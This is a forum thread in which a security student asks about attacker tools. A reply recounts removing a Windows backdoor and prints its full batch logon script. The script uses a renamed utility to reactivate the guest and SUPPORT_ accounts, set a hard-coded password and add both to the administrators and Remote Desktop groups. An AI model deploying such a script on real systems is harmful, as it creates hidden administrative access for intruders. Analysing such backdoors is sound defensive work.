Hi i am new to the forum and relatively new to security.  I have to write a paper on an attack that affected a business not too long ago and i need a little bit of help. 

As i am not very familiar with hacking tools and exploits used my cyber-criminals i need guidance on what tools could have been utilized to cause the following:

- Alter system tools to hide presence on network (rootkit),
- Create a backdoor Trojan as a means of accessing a network.

I know of a few such as armatage and metasploit but as they are pretty comprehensive and i haven't been able to find information that would indicate they could do these things.

Any direction would be brilliant!

Thanks guys.

Well the last "backdoor" that I removed from a server was actually pretty simple. It was a batch file that had a hidden name and a hidden file extension. It was pretty invisible to casual searching. It was set as a log on script. Basically it referenced copies of some of the windows utilities that were renamed and located in system32\drivers\etc.

the script went like this:

@cd %systemroot%\system32\drivers\etc\
@1 localgroup "Remote Desktop Users" SUPPORT_388945a0 /add
@1 localgroup "Remote Desktop Users" guest /add
@1 user guest QQqqaa123321
@1 user guest QQqqaa123321 /add
@1 localgroup administrators guest /add
@1 user guest /active:yes
@1 user SUPPORT_388945a0 QQqqaa123321
@1 user SUPPORT_388945a0 QQqqaa123321 /add
@1 localgroup administrators SUPPORT_388945a0 /add
@1 user SUPPORT_388945a0 /active:yes


Pretty basic, but it did the job of reactivating the accounts and resetting the passwords. Slipped by the AV pretty easily.